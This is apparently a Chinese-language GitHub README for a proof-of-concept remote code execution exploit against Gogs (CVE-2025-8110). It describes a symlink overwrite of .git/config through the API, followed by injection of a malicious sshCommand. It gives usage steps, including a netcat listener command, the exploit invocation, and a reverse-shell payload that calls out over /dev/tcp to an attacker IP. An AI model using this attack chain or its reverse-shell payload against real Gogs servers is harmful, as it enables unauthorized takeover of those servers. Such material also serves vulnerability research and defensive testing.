Ghxstsec/CVE-2025-8110
GitHub: Ghxstsec/CVE-2025-8110
针对 Gogs 的 CVE-2025-8110 漏洞利用工具,实现通过符号链接与 sshCommand 注入触发远程代码执行。
Stars: 1 | Forks: 2
# Gogs RCE 漏洞利用 (CVE-2025-8110)



**CVE-2025-8110** 的概念验证(PoC),一种 Gogs 中的关键漏洞,允许通过操纵 `.git/config` 文件(使用符号链接绕过和 `sshCommand` 注入)实现远程代码执行(RCE)。
## 📖 概述
此漏洞利用 Gogs API 内容管理中的路径遍历缺陷。认证用户可以:
1. 创建一个仓库并推送指向内部 `.git/config` 的**符号链接**。
2. 使用 API 通过符号链接覆盖目标配置文件。
3. 注入恶意的 `sshCommand`,在服务器执行 Git 操作时触发**反向 Shell**。
## 🚀 功能特性
- **自动化流程**:处理登录、仓库创建、符号链接部署和注入。
- **健壮的编码**:自动对凭证进行 URL 编码,以处理特殊字符(例如 `!`、`@`)。
- **丰富的输出**:使用 `Rich` 库实现高可见性日志记录。
## 🛠️ 先决条件
- **Python 3.12+**
- 系统中安装 **Git**。
- 目标 Gogs 实例的有效凭证。
## 📦 安装
1. 克隆仓库:
git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
安装依赖项:
```
pip3 install -r requirements.txt
```
💻 使用方法
启动监听器:
```
nc -lvnp 6666
```
运行漏洞利用:
```
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh -lp 6666 -p 'YourPassword123!'
```
参数说明:
| 参数 | 描述 |
|---|---|
| `-u, --url` | 目标 Gogs 实例的基准 URL(例如 `http://target.htb:3000`)。 |
| `-lh, --host` | 攻击者 IP(LHOST),反向 Shell 将连接至此。 |
| `-lp, --port` | 监听端口(LPORT),在本机配置的端口。 |
| `-p, --password` | 用于认证的 `pwnuser` 账户密码。 |
| `-x, --proxy` | (可选)通过本地代理路由流量(默认:`http://localhost:8080`)。 |
#### 漏洞核心:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
当 Gogs 执行需要网络传输的 Git 命令(例如镜像同步或内部引用检查)时,会调用 `sshCommand`,从而触发反向 Shell。
### ⚠️ 法律声明:此工具仅供教育和授权安全测试使用。作者不对任何误用或由此脚本造成的损害负责。未经授权访问计算机系统是非法的。
标签:API安全, CVE-2025-8110, DNS 解析, Git, Gogs, Go语言工具, HTTP工具, IP 地址批量处理, JSON输出, PoC, Python, RCE, Rich库, SSH命令注入, URL编码, 反向Shell, 无后门, 暴力破解, 权限绕过, 符号链接绕过, 编程工具, 网络安全, 网络安全研究, 网络调试, 自动化, 路径遍历, 远程代码执行, 逆向工具, 隐私保护